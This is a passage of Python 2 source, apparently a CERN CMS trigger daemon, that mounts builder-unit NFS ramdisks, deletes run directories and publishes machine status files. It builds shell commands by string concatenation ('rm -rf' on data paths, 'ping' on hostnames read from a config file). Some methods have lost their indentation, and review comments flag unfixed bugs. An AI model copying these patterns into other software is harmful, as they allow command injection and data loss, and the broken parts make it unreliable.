        mounts = re.findall('/'+conf.bu_base_dir+'[0-9]+',out) + re.findall('/'+conf.bu_base_dir+'-CI/',out)
        mounts = sorted(list(set(mounts)))
        logger.info("cleanup_mountpoints: found following mount points: ")
        logger.info(mounts)
        umount_failure=False
        for mpoint in mounts:
            point = mpoint.rstrip('/')
            umount_failure = umount_helper(os.path.join('/'+point,conf.ramdisk_subdirectory))==False
            #only attempt this if first umount was successful
            if umount_failure==False and not point.rstrip('/').endswith("-CI"):
                umount_failure = umount_helper(os.path.join('/'+point,conf.output_subdirectory))==False
            #this will remove directories only if they are empty (as unmounted mount point should be)
            try:
                if os.path.join('/'+point,conf.ramdisk_subdirectory)!='/':
                    os.rmdir(os.path.join('/'+point,conf.ramdisk_subdirectory))
            except Exception as ex:
                logger.exception(ex)
            try:
                if os.path.join('/'+point,conf.output_subdirectory)!='/':
                    if not point.rstrip('/').endswith("-CI"):
                        os.rmdir(os.path.join('/'+point,conf.output_subdirectory))
            except Exception as ex:
                logger.exception(ex)
        if remount==False:
            if umount_failure:return False
            return True
        i = 0
        # bus.config lives next to the resource_base directory and lists one
        # BU hostname per line.
        bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
        if os.path.exists(bus_config):
            lines = []
            with open(bus_config) as fp:
                lines = fp.readlines()
            # Optional control-interface (CI) ramdisk mount of the first BU.
            if conf.mount_control_path and len(lines):
                try:
                    os.makedirs(os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
                except OSError:
                    pass
                try:
                    # control-network alias: first DNS label + '.cms'
                    mountaddr = lines[0].split('.')[0]+'.cms'
                    #VM fallback
                    if lines[0].endswith('.cern.ch'): mountaddr = lines[0]
                    logger.info("found BU to mount (CI) at " + mountaddr)
                except Exception as ex:
                    logger.fatal('Unable to parse bus.config file')
                    logger.exception(ex)
                    sys.exit(1)
                attemptsLeft = 8
                while attemptsLeft>0:
                    #by default ping waits 10 seconds
                    p_begin = datetime.datetime.now()
                    if os.system("ping -c 1 "+mountaddr)==0:
                        break
                    else:
                        p_end = datetime.datetime.now()
                        logger.warning('unable to ping '+mountaddr)
                        dt = p_end - p_begin
                        if dt.seconds < 10:
                            time.sleep(10-dt.seconds)
                    attemptsLeft-=1
                    if attemptsLeft==0:
                        logger.fatal('hltd was unable to ping BU '+mountaddr)
                        #check if bus.config has been updated
                        # NOTE(review): busconfig_age is only assigned further
                        # below (after the CI mount); if ping attempts are
                        # exhausted here on the first pass this raises
                        # NameError -- confirm and fix the ordering.
                        if (os.path.getmtime(bus_config) - busconfig_age)>1:
                            return cleanup_mountpoints(remount)
                        attemptsLeft=8
                        #sys.exit(1)
                if True:
                    logger.info("trying to mount (CI) "+mountaddr+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
                    try:
                        subprocess.check_call(
                            [conf.mount_command,
                            '-t',
                            conf.mount_type,
                            '-o',
                            conf.mount_options_ramdisk,
                            mountaddr+':/fff/'+conf.ramdisk_subdirectory,
                            os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)]
                        )
                        toappend = os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)
                        bu_disk_ramdisk_CI=toappend
                        if conf.instance=="main":
                            bu_disk_ramdisk_CI_instance = toappend
                        else:
                            bu_disk_ramdisk_CI_instance = os.path.join(toappend,conf.instance)
                    except subprocess.CalledProcessError, err2:
                        logger.exception(err2)
                        logger.fatal("Unable to mount ramdisk - exiting.")
                        sys.exit(1)
            # remember the bus.config mtime so later ping failures can detect
            # whether the file was edited in the meantime
            busconfig_age = os.path.getmtime(bus_config)
            # Mount the ramdisk and output exports of every listed BU.
            for line in lines:
                logger.info("found BU to mount at "+line.strip())
                try:
                    os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
                except OSError:
                    pass
                try:
                    os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
                except OSError:
                    pass
                attemptsLeft = 8
                while attemptsLeft>0:
                    #by default ping waits 10 seconds
                    p_begin = datetime.datetime.now()
                    if os.system("ping -c 1 "+line.strip())==0:
                        break
                    else:
                        p_end = datetime.datetime.now()
                        logger.warning('unable to ping '+line.strip())
                        dt = p_end - p_begin
                        if dt.seconds < 10:
                            time.sleep(10-dt.seconds)
                    attemptsLeft-=1
                    if attemptsLeft==0:
                        logger.fatal('hltd was unable to ping BU '+line.strip())
                        #check if bus.config has been updated
                        if (os.path.getmtime(bus_config) - busconfig_age)>1:
                            return cleanup_mountpoints(remount)
                        attemptsLeft=8
                        #sys.exit(1)
                if True:
                    logger.info("trying to mount "+line.strip()+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
                    try:
                        subprocess.check_call(
                            [conf.mount_command,
                            '-t',
                            conf.mount_type,
                            '-o',
                            conf.mount_options_ramdisk,
                            line.strip()+':/fff/'+conf.ramdisk_subdirectory,
                            os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)]
                        )
                        toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)
                        bu_disk_list_ramdisk.append(toappend)
                        if conf.instance=="main":
                            bu_disk_list_ramdisk_instance.append(toappend)
                        else:
                            bu_disk_list_ramdisk_instance.append(os.path.join(toappend,conf.instance))
                    except subprocess.CalledProcessError, err2:
                        logger.exception(err2)
                        logger.fatal("Unable to mount ramdisk - exiting.")
                        sys.exit(1)
                    logger.info("trying to mount "+line.strip()+':/fff/'+conf.output_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
                    try:
                        subprocess.check_call(
                            [conf.mount_command,
                            '-t',
                            conf.mount_type,
                            '-o',
                            conf.mount_options_output,
                            line.strip()+':/fff/'+conf.output_subdirectory,
                            os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)]
                        )
                        toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)
                        bu_disk_list_output.append(toappend)
                        if conf.instance=="main" or conf.instance_same_destination==True:
                            bu_disk_list_output_instance.append(toappend)
                        else:
                            bu_disk_list_output_instance.append(os.path.join(toappend,conf.instance))
                    except subprocess.CalledProcessError, err2:
                        logger.exception(err2)
                        logger.fatal("Unable to mount output - exiting.")
                        sys.exit(1)
                i+=1
        #clean up suspended state
        try:
            if remount==True:os.popen('rm -rf '+conf.watch_directory+'/suspend*')
        except:pass
    except Exception as ex:
        logger.error("Exception in cleanup_mountpoints")
        logger.exception(ex)
        if remount==True:
            logger.fatal("Unable to handle (un)mounting")
            return False
        else:return False
def submount_size(basedir):
    """Return the total size in bytes of loop-mounted image files whose
    backing file and mount point both live under *basedir*.

    Best effort: returns 0 if 'mount' cannot be run or its output parsed.
    """
    loop_size = 0
    try:
        p = subprocess.Popen("mount", shell=False, stdout=subprocess.PIPE)
        # communicate() instead of wait()+stdout.read(): reading after wait()
        # can deadlock when the pipe buffer fills up.
        std_out = p.communicate()[0].split("\n")
        for line in std_out:
            try:
                toks = line.split()
                # mount output: <dev> on <mountpoint> type <fs> (<options>)
                if toks[0].startswith(basedir) and toks[2].startswith(basedir) and 'loop' in toks[5]:
                    loop_size += os.stat(toks[0]).st_size
            except Exception:
                # short or non-matching mount lines are expected; skip them
                pass
    except Exception:
        pass
    return loop_size
def _remove_run_dirs(basedir, run, label):
    # Remove run directories under basedir via 'rm -rf', retrying up to 10
    # times since NFS/busy files can make deletion fail transiently.
    if run==None:
        target = basedir+'/run*'
    else:
        target = basedir+'/run'+str(run)
    tries = 10
    while tries > 0:
        tries-=1
        p = subprocess.Popen("rm -rf " + target,shell=True)
        p.wait()
        if p.returncode==0:
            logger.info(label+' cleanup performed')
            break
        else:
            logger.info('Failed '+label+' cleanup (return code:'+str(p.returncode)+') in attempt '+str(10-tries))

def cleanup_bu_disks(run=None,cleanRamdisk=True,cleanOutput=True):
    """Delete run directories on the BU ramdisk and/or output disk.

    run: specific run number, or None to delete all runs.
    Only acts when the configured paths are under /fff and contain the
    expected subdirectory name (safety guard against deleting elsewhere).
    The two previously-duplicated retry loops are factored into
    _remove_run_dirs (log messages unified in the process).
    """
    if cleanRamdisk:
        if conf.watch_directory.startswith('/fff') and conf.ramdisk_subdirectory in conf.watch_directory:
            logger.info('cleanup BU disks: deleting runs in ramdisk ...')
            _remove_run_dirs(conf.watch_directory, run, 'Ramdisk')
    if cleanOutput:
        outdirPath = conf.watch_directory[:conf.watch_directory.find(conf.ramdisk_subdirectory)]+conf.output_subdirectory
        logger.info('outdirPath:'+ outdirPath + ' '+conf.output_subdirectory)
        if outdirPath.startswith('/fff') and conf.output_subdirectory in outdirPath:
            logger.info('cleanup BU disks: deleting runs in output disk ...')
            _remove_run_dirs(outdirPath, run, 'Output')
def calculate_threadnumber():
    """Derive the CMSSW thread/stream counts and the number of expected
    processes from the count of idle resource files.

    Sets the module globals nthreads, nstreams and expected_processes.
    """
    global nthreads
    global nstreams
    global expected_processes
    idlecount = len(os.listdir(idles))
    if conf.cmssw_threads_autosplit>0:
        nthreads = idlecount/conf.cmssw_threads_autosplit
        nstreams = idlecount/conf.cmssw_threads_autosplit
        # Fixed evenness check: the original compared nthreads*k against
        # nthreads (always unequal for k>1, nthreads>0); the split is uneven
        # exactly when nthreads*k does not reconstruct idlecount.
        if nthreads*conf.cmssw_threads_autosplit != idlecount:
            logger.error("idle cores can not be evenly split to cmssw threads")
    else:
        nthreads = conf.cmssw_threads
        nstreams = conf.cmssw_streams
    expected_processes = idlecount/nstreams
def updateBlacklist(blfile):
    """Read the static blacklist file *blfile* and synchronize it into
    <watch_directory>/appliance/blacklist (BU role only).

    Returns a (success, black_list) tuple; success is False only when the
    active blacklist file could not be (re)written.
    """
    black_list=[]
    active_black_list=[]
    #TODO:this will be updated to read blacklist from database
    if conf.role=='bu':
        try:
            if os.stat(blfile).st_size>0:
                with open(blfile,'r') as fi:
                    try:
                        static_black_list = json.load(fi)
                        for item in static_black_list:
                            black_list.append(item)
                        logger.info("found these resources in " + blfile + " : " + str(black_list))
                    except ValueError:
                        logger.error("error parsing /etc/appliance/blacklist")
        except:
            #no blacklist file, this is ok
            pass
        # de-duplicate entries
        black_list=list(set(black_list))
        try:
            forceUpdate=False
            with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
                active_black_list = json.load(fi)
        except:
            # active blacklist missing/unreadable -> force a rewrite below
            forceUpdate=True
        if forceUpdate==True or active_black_list != black_list:
            try:
                with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'w') as fi:
                    json.dump(black_list,fi)
            except:
                return False,black_list
    #TODO:check on FU if blacklisted
    return True,black_list
def restartLogCollector(instanceParam):
    """(Re)spawn the logcollector.py helper for the given instance,
    terminating any previously running collector first."""
    global logCollector
    if logCollector is not None:
        logger.info("terminating logCollector")
        logCollector.terminate()
        logCollector = None
    logger.info("starting logcollector.py")
    logCollector = subprocess.Popen(
        ['/opt/hltd/python/logcollector.py', instanceParam],
        preexec_fn=preexec_function,
        close_fds=True)
class system_monitor(threading.Thread):
    def __init__(self):
        """Thread that periodically publishes this host's box info file(s)
        into the appliance 'boxes' directory and watches NFS mount health."""
        threading.Thread.__init__(self)
        self.running = True
        self.hostname = os.uname()[1]
        self.directory = []
        self.file = []
        # compute target directories/files from the current mount state
        self.rehash()
        self.create_file=True
        self.threadEvent = threading.Event()
        self.threadEventStat = threading.Event()
        self.statThread = None
        # set True by runStatNFS when mounts look stale or unusually slow
        self.stale_flag=False
        self.boxdoc_version = boxdoc_version
        # with a control path configured, NFS health runs in its own thread
        if conf.mount_control_path:
            self.startStatNFS()
    def rehash(self):
        """Recompute the box info target directories/files after a (re)mount."""
        if conf.role == 'fu':
            # 'dn' directories on the BU ramdisk are used by runStatNFS for
            # the write-health check
            self.check_directory = [os.path.join(x,'appliance','dn') for x in bu_disk_list_ramdisk_instance]
            #write only in one location
            if conf.mount_control_path:
                logger.info('Updating box info via control interface')
                self.directory = [os.path.join(bu_disk_ramdisk_CI_instance,'appliance','boxes')]
            else:
                logger.info('Updating box info via data interface')
                self.directory = [os.path.join(bu_disk_list_ramdisk_instance[0],'appliance','boxes')]
            self.check_file = [os.path.join(x,self.hostname) for x in self.check_directory]
        else:
            # BU publishes into its own watch directory
            self.directory = [os.path.join(conf.watch_directory,'appliance/boxes/')]
            try:
                #if directory does not exist: check if it is renamed to specific name (non-main instance)
                if not os.path.exists(self.directory[0]) and conf.instance=="main":
                    os.makedirs(self.directory[0])
            except OSError:
                pass
        self.file = [os.path.join(x,self.hostname) for x in self.directory]
        logger.info("system_monitor: rehash found the following BU disk(s):"+str(self.file))
        for disk in self.file:
            logger.info(disk)
def startStatNFS(self):
if conf.role == "fu":
self.statThread = threading.Thread(target = self.runStatNFS)
self.statThread.start()
    def runStatNFS(self):
        """NFS watchdog (FU): stat the BU mountpoints to detect stale file
        handles and, when using the control path, verify that the box check
        files stay writable.  Sets self.stale_flag when a check fails or
        takes unusually long.  Loops while self.running when a control path
        is configured; otherwise performs a single pass and returns.
        """
        fu_stale_counter=0
        fu_stale_counter2=0
        while self.running:
            if conf.mount_control_path:
                self.threadEventStat.wait(2)
            time_start = time.time()
            err_detected = False
            try:
                #check for NFS stale file handle
                for disk in bu_disk_list_ramdisk:
                    mpstat = os.stat(disk)
                for disk in bu_disk_list_output:
                    mpstat = os.stat(disk)
                if bu_disk_ramdisk_CI:
                    disk = bu_disk_ramdisk_CI
                    mpstat = os.stat(disk)
                #no issue if we reached this point
                fu_stale_counter = 0
            except (IOError,OSError) as ex:
                err_detected=True
                # errno 116 == ESTALE (stale NFS file handle); log only every
                # 500th occurrence to avoid flooding
                if ex.errno == 116:
                    if fu_stale_counter==0 or fu_stale_counter%500==0:
                        logger.fatal('detected stale file handle: '+str(disk))
                else:
                    logger.warning('stat mountpoint ' + str(disk) + ' caught Error: '+str(ex))
                fu_stale_counter+=1
                err_detected=True
            except Exception as ex:
                err_detected=True
                logger.warning('stat mountpoint ' + str(disk) + ' caught exception: '+str(ex))
            #if stale handle checks passed, check if write access and timing are normal
            #for all data network ramdisk mountpoints
            if conf.mount_control_path and not err_detected:
                try:
                    for mfile in self.check_file:
                        with open(mfile,'w') as fp:
                            fp.write('{}')
                    fu_stale_counter2 = 0
                    #os.stat(mfile)
                except IOError as ex:
                    err_detected = True
                    fu_stale_counter2+=1
                    if ex.errno==2:
                        #still an error if htld on BU did not create 'appliance/dn' dir
                        if fu_stale_counter2==0 or fu_stale_counter2%20==0:
                            logger.warning('unable to update '+mfile+ ' : '+str(ex))
                    else:
                        logger.error('update file ' + mfile + ' caught Error:'+str(ex))
                except Exception as ex:
                    err_detected = True
                    logger.error('update file ' + mfile + ' caught exception:'+str(ex))
            #measure time needed to do these actions. stale flag is set if it takes more than 10 seconds
            stat_time_delta = time.time()-time_start
            if stat_time_delta>5:
                if conf.mount_control_path:
                    logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform file handle and boxinfo stat check")
                else:
                    logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform stale file handle check")
            if stat_time_delta>5 or err_detected:
                self.stale_flag=True
            else:
                #clear stale flag if successful
                self.stale_flag=False
            #no loop if called inside main loop
            if not conf.mount_control_path:
                return
    def run(self):
        """Main loop of the system monitor thread.

        Each iteration publishes this host's "box" file(s) into the appliance
        directory; on the BU it additionally aggregates the box files reported
        by all FUs into a 'resource_summary' document. On exit the box files
        written by this host are removed.
        """
        try:
            logger.debug('entered system monitor thread ')
            global suspended
            global ramdisk_submount_size
            global masked_resources
            res_path_temp = os.path.join(conf.watch_directory,'appliance','resource_summary_temp')
            res_path = os.path.join(conf.watch_directory,'appliance','resource_summary')
            selfhost = os.uname()[1]
            boxinfo_update_attempts=0
            counter=0
            while self.running:
                #first iteration waits only 1s so a box file appears promptly
                self.threadEvent.wait(5 if counter>0 else 1)
                counter+=1
                counter=counter%5
                if suspended:continue
                tstring = datetime.datetime.utcfromtimestamp(time.time()).isoformat()
                ramdisk = None
                if conf.role == 'bu':
                    #ramdisk occupancy fraction, excluding submounted output areas
                    ramdisk = os.statvfs(conf.watch_directory)
                    ramdisk_occ=1
                    try:ramdisk_occ = float((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)/float(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)
                    except:pass
                    if ramdisk_occ<0:
                        ramdisk_occ=0
                        #NOTE(review): logger.info gets a second positional arg but the
                        #message has no % placeholder, so the value is not rendered
                        logger.info('incorrect ramdisk occupancy',ramdisk_occ)
                    if ramdisk_occ>1:
                        ramdisk_occ=1
                        logger.info('incorrect ramdisk occupancy',ramdisk_occ)
                    #init per-iteration aggregation counters
                    resource_count_idle = 0
                    resource_count_used = 0
                    resource_count_broken = 0
                    resource_count_quarantined = 0
                    resource_count_stale = 0
                    resource_count_pending = 0
                    resource_count_activeRun = 0
                    cloud_count = 0
                    lastFURuns = []
                    lastFUrun=-1
                    activeRunQueuedLumisNum = -1
                    activeRunCMSSWMaxLumi = -1
                    active_res = 0
                    fu_data_alarm=False
                    current_time = time.time()
                    stale_machines = []
                    try:
                        current_runnumber = runList.getLastRun().runnumber
                    except:
                        current_runnumber=0
                    #first pass over FU box files: sum up resource counts
                    for key in boxinfoFUMap:
                        if key==selfhost:continue
                        try:
                            edata,etime,lastStatus = boxinfoFUMap[key]
                        except:continue #deleted?
                        #skip entries older than 10s or without data
                        if current_time - etime > 10 or edata == None: continue
                        try:
                            try:
                                if edata['version']!=self.boxdoc_version:
                                    logger.warning('box file version mismatch from '+str(key)+' got:'+str(edata['version'])+' required:'+str(self.boxdoc_version))
                                    continue
                            except:
                                logger.warning('box file version for '+str(key)+' not found')
                                continue
                            if edata['detectedStaleHandle']:
                                stale_machines.append(str(key))
                                resource_count_stale+=edata['idles']+edata['used']+edata['broken']
                            else:
                                if current_runnumber in edata['activeRuns']:
                                    resource_count_activeRun += edata['used_activeRun']+edata['broken_activeRun']
                                active_addition =0
                                if edata['cloudState'] == "resourcesReleased":
                                    resource_count_pending += edata['idles']
                                else:
                                    resource_count_idle+=edata['idles']
                                    active_addition+=edata['idles']
                                active_addition+=edata['used']
                                resource_count_used+=edata['used']
                                resource_count_broken+=edata['broken']
                                resource_count_quarantined+=edata['quarantined']
                                #active resources reported to BU if cloud state is off
                                if edata['cloudState'] == "off":
                                    active_res+=active_addition
                            cloud_count+=edata['cloud']
                            fu_data_alarm = edata['fuDataAlarm'] or fu_data_alarm
                        except Exception as ex:
                            logger.warning('problem updating boxinfo summary: '+str(ex))
                        try:
                            lastFURuns.append(edata['activeRuns'][-1])
                        except:pass
                    if len(stale_machines) and counter==1:
                        logger.warning("detected stale box resources: "+str(stale_machines))
                    fuRuns = sorted(list(set(lastFURuns)))
                    if len(fuRuns)>0:
                        lastFUrun = fuRuns[-1]
                        #second pass: pick max queued/CMSSW LS numbers for the latest run
                        for key in boxinfoFUMap:
                            if key==selfhost:continue
                            try:
                                edata,etime,lastStatus = boxinfoFUMap[key]
                            except:continue #deleted?
                            if current_time - etime > 10 or edata == None: continue
                            try:
                                try:
                                    if edata['version']!=self.boxdoc_version: continue
                                except: continue
                                lastrun = edata['activeRuns'][-1]
                                if lastrun==lastFUrun:
                                    qlumis = int(edata['activeRunNumQueuedLS'])
                                    if qlumis>activeRunQueuedLumisNum:activeRunQueuedLumisNum=qlumis
                                    maxcmsswls = int(edata['activeRunCMSSWMaxLS'])
                                    if maxcmsswls>activeRunCMSSWMaxLumi:activeRunCMSSWMaxLumi=maxcmsswls
                            except:pass
                    res_doc = {
                        "active_resources":active_res,
                        "active_resources_activeRun":resource_count_activeRun,
                        #"active_resources":resource_count_activeRun,
                        "idle":resource_count_idle,
                        "used":resource_count_used,
                        "broken":resource_count_broken,
                        "quarantined":resource_count_quarantined,
                        "stale_resources":resource_count_stale,
                        "cloud":cloud_count,
                        "pending_resources":resource_count_pending,
                        "activeFURun":lastFUrun,
                        "activeRunNumQueuedLS":activeRunQueuedLumisNum,
                        "activeRunCMSSWMaxLS":activeRunCMSSWMaxLumi,
                        "ramdisk_occupancy":ramdisk_occ,
                        "fuDiskspaceAlarm":fu_data_alarm
                    }
                    with open(res_path_temp,'w') as fp:
                        json.dump(res_doc,fp,indent=True)
                    #write temp file, then rename, so readers never see a partial doc
                    os.rename(res_path_temp,res_path)
                    res_doc['fm_date']=tstring
                    try:boxInfo.ec.injectSummaryJson(res_doc)
                    except:pass
                for mfile in self.file:
                    if conf.role == 'fu':
                        #check if stale file handle (or slow access)
                        if not conf.mount_control_path:
                            self.runStatNFS()
                        if fu_watchdir_is_mountpoint:
                            dirstat = os.statvfs(conf.watch_directory)
                            #NOTE(review): the trailing commas make d_used/d_total 1-tuples
                            #here, unlike the plain ints of the else branch -- confirm intended
                            d_used = ((dirstat.f_blocks - dirstat.f_bavail)*dirstat.f_bsize)>>20,
                            d_total = (dirstat.f_blocks*dirstat.f_bsize)>>20,
                        else:
                            p = subprocess.Popen("du -s --exclude " + ES_DIR_NAME + " --exclude mon --exclude open " + str(conf.watch_directory), shell=True, stdout=subprocess.PIPE)
                            p.wait()
                            std_out=p.stdout.read()
                            out = std_out.split('\t')[0]
                            d_used = int(out)>>10
                            d_total = conf.max_local_disk_usage
                        lastrun = runList.getLastRun()
                        n_used_activeRun=0
                        n_broken_activeRun=0
                        try:
                            #if cloud_mode==True and entering_cloud_mode==True:
                            #    n_idles = 0
                            #    n_used = 0
                            #    n_broken = 0
                            #    n_cloud = len(os.listdir(cloud))+len(os.listdir(idles))+len(os.listdir(used))+len(os.listdir(broken))
                            #else:
                            usedlist = os.listdir(used)
                            brokenlist = os.listdir(broken)
                            if lastrun:
                                try:
                                    n_used_activeRun = lastrun.countOwnedResourcesFrom(usedlist)
                                    n_broken_activeRun = lastrun.countOwnedResourcesFrom(brokenlist)
                                except:pass
                            n_idles = len(os.listdir(idles))
                            n_used = len(usedlist)
                            n_broken = len(brokenlist)
                            n_cloud = len(os.listdir(cloud))
                            global num_excluded
                            n_quarantined = len(os.listdir(quarantined))-num_excluded
                            if n_quarantined<0: n_quarantined=0
                            numQueuedLumis,maxCMSSWLumi=self.getLumiQueueStat()
                            cloud_state = "off"
                            if cloud_mode:
                                if entering_cloud_mode: cloud_state="starting"
                                elif exiting_cloud_mode:cloud_state="stopping"
                                else: cloud_state="on"
                            elif resources_blocked_flag:
                                cloud_state = "resourcesReleased"
                            elif masked_resources:
                                cloud_state = "resourcesMasked"
                            else:
                                cloud_state = "off"
                            boxdoc = {
                                'fm_date':tstring,
                                'idles' : n_idles,
                                'used' : n_used,
                                'broken' : n_broken,
                                'used_activeRun' : n_used_activeRun,
                                'broken_activeRun' : n_broken_activeRun,
                                'cloud' : n_cloud,
                                'quarantined' : n_quarantined,
                                'usedDataDir' : d_used,
                                'totalDataDir' : d_total,
                                'fuDataAlarm' : d_used > 0.9*d_total,
                                'activeRuns' : runList.getActiveRunNumbers(),
                                'activeRunNumQueuedLS':numQueuedLumis,
                                'activeRunCMSSWMaxLS':maxCMSSWLumi,
                                'activeRunStats':runList.getStateDoc(),
                                'cloudState':cloud_state,
                                'detectedStaleHandle':self.stale_flag,
                                'version':self.boxdoc_version
                            }
                            with open(mfile,'w+') as fp:
                                json.dump(boxdoc,fp,indent=True)
                            boxinfo_update_attempts=0
                        except (IOError,OSError) as ex:
                            logger.warning('boxinfo file write failed :'+str(ex))
                            #detecting stale file handle on recreated loop fs and remount
                            #(errno 116 == ESTALE, 2 == ENOENT); touch suspend0 so the
                            #RunRanger remounts, but only after 5 consecutive failures
                            if conf.instance!='main' and (ex.errno==116 or ex.errno==2) and boxinfo_update_attempts>=5:
                                boxinfo_update_attempts=0
                                try:os.unlink(os.path.join(conf.watch_directory,'suspend0'))
                                except:pass
                                with open(os.path.join(conf.watch_directory,'suspend0'),'w'):
                                    pass
                                time.sleep(1)
                            boxinfo_update_attempts+=1
                        except Exception as ex:
                            logger.warning('exception on boxinfo file write failed : +'+str(ex))
                    if conf.role == 'bu':
                        outdir = os.statvfs('/fff/output')
                        boxdoc = {
                            'fm_date':tstring,
                            'usedRamdisk':((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)>>20,
                            'totalRamdisk':(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)>>20,
                            'usedOutput':((outdir.f_blocks - outdir.f_bavail)*outdir.f_bsize)>>20,
                            'totalOutput':(outdir.f_blocks*outdir.f_bsize)>>20,
                            'activeRuns':runList.getActiveRunNumbers(),
                            "version":self.boxdoc_version
                        }
                        with open(mfile,'w+') as fp:
                            json.dump(boxdoc,fp,indent=True)
        except Exception as ex:
            logger.exception(ex)
        #on shutdown remove this host's box file(s) so the appliance forgets us
        for mfile in self.file:
            try:
                os.remove(mfile)
            except OSError:
                pass
        logger.debug('exiting system monitor thread ')
def getLumiQueueStat(self):
try:
with open(os.path.join(conf.watch_directory,'run'+str(runList.getLastRun().runnumber).zfill(conf.run_number_padding),
'open','queue_status.jsn'),'r') as fp:
#fcntl.flock(fp, fcntl.LOCK_EX)
statusDoc = json.load(fp)
return str(statusDoc["numQueuedLS"]),str(statusDoc["CMSSWMaxLS"])
except:
return "-1","-1"
def stop(self):
logger.debug("system_monitor: request to stop")
self.running = False
self.threadEvent.set()
self.threadEventStat.set()
if self.statThread:
self.statThread.join()
class BUEmu:
    """Launches and stops a BU-emulator CMSSW process via startRun.sh."""
    def __init__(self):
        self.process=None        # subprocess.Popen of the emulator, or None
        self.runnumber = None    # run currently emulated, or None
    def startNewRun(self,nr):
        """Fork the BU emulator for run number nr (one run at a time)."""
        if self.runnumber:
            logger.error("Another BU emulator run "+str(self.runnumber)+" is already ongoing")
            return
        self.runnumber = nr
        configtouse = conf.test_bu_config
        destination_base = None
        #NOTE(review): 'role' and 'startindex' are not defined in this scope
        #(other code uses conf.role); this branch likely raises NameError -- verify
        if role == 'fu':
            destination_base = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
        else:
            destination_base = conf.watch_directory
        if "_patch" in conf.cmssw_default_version:
            full_release="cmssw-patch"
        else:
            full_release="cmssw"
        new_run_args = [conf.cmssw_script_location+'/startRun.sh',
                        conf.cmssw_base,
                        conf.cmssw_arch,
                        conf.cmssw_default_version,
                        conf.exec_directory,
                        full_release,
                        'null',
                        configtouse,
                        str(nr),
                        '/tmp', #input dir is not needed
                        destination_base,
                        '1',
                        '1']
        try:
            self.process = subprocess.Popen(new_run_args,
                                            preexec_fn=preexec_function,
                                            close_fds=True
                                            )
        except Exception as ex:
            logger.error("Error in forking BU emulator process")
            logger.error(ex)
    def stop(self):
        """Interrupt the emulator process, wait for exit, and clear run state."""
        os.kill(self.process.pid,SIGINT)
        self.process.wait()
        self.runnumber=None
#module-level singleton used to drive BU-emulator test runs
bu_emulator=BUEmu()
class OnlineResource:
    """Bookkeeping for a group of CPU cores that runs one HLT (cmsRun) process.

    On the FU this forks the cmsRun wrapper script and attaches a
    ProcessWatchdog thread; on the BU it notifies the remote FU of run
    start/stop over the FU's CGI interface.
    """
    def __init__(self,parent,resourcenames,lock):
        self.parent = parent                 # owning Run instance
        self.hoststate = 0 #@@MO what is this used for?
        self.cpu = resourcenames             # list of core (resource file) names
        self.process = None                  # subprocess.Popen of the HLT job
        self.processstate = None             # 100 while starting, exit code after
        self.watchdog = None                 # ProcessWatchdog thread
        self.runnumber = None
        self.assigned_run_dir = None
        self.lock = lock
        self.retry_attempts = 0
        self.quarantined = []
    def ping(self):
        #BU-side liveness check; the result is currently discarded
        if conf.role == 'bu':
            if not os.system("ping -c 1 "+self.cpu[0])==0: pass #self.hoststate = 0
    def NotifyNewRunStart(self,runnumber):
        """Asynchronously notify the FU of a new run via its start CGI."""
        self.runnumber = runnumber
        self.notifyNewRunThread = threading.Thread(target = self.NotifyNewRun,args=[runnumber])
        self.notifyNewRunThread.start()
    def NotifyNewRunJoin(self):
        """Wait for the notification thread started by NotifyNewRunStart."""
        self.notifyNewRunThread.join()
        self.notifyNewRunThread=None
    def NotifyNewRun(self,runnumber):
        """Call start_cgi on the FU, retrying the connection up to 3 times."""
        self.runnumber = runnumber
        logger.info("calling start of run on "+self.cpu[0])
        attemptsLeft=3
        while attemptsLeft>0:
            attemptsLeft-=1
            try:
                connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=10)
                connection.request("GET",'cgi-bin/start_cgi.py?run='+str(runnumber))
                response = connection.getresponse()
                #do something intelligent with the response code
                logger.error("response was "+str(response.status))
                if response.status > 300: self.hoststate = 1
                else:
                    logger.info(response.read())
                break
            except Exception as ex:
                if attemptsLeft>0:
                    logger.error(str(ex))
                    logger.info('retrying connection to '+str(self.cpu[0]))
                else:
                    logger.error('Exhausted attempts to contact '+str(self.cpu[0]))
                    logger.exception(ex)
    def NotifyShutdown(self):
        """Call stop_cgi on the FU (best effort; errors are only logged)."""
        try:
            #fix: was self.cgi_instance_port_offset -- an attribute never set on this
            #class (AttributeError on every call); use conf as NotifyNewRun does
            connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
            connection.request("GET",'cgi-bin/stop_cgi.py?run='+str(self.runnumber))
            time.sleep(0.05)
            response = connection.getresponse()
            time.sleep(0.05)
            #do something intelligent with the response code
            #if response.status > 300: self.hoststate = 0
        except Exception as ex:
            logger.exception(ex)
    def StartNewProcess(self ,runnumber, startindex, arch, version, menu,transfermode,num_threads,num_streams):
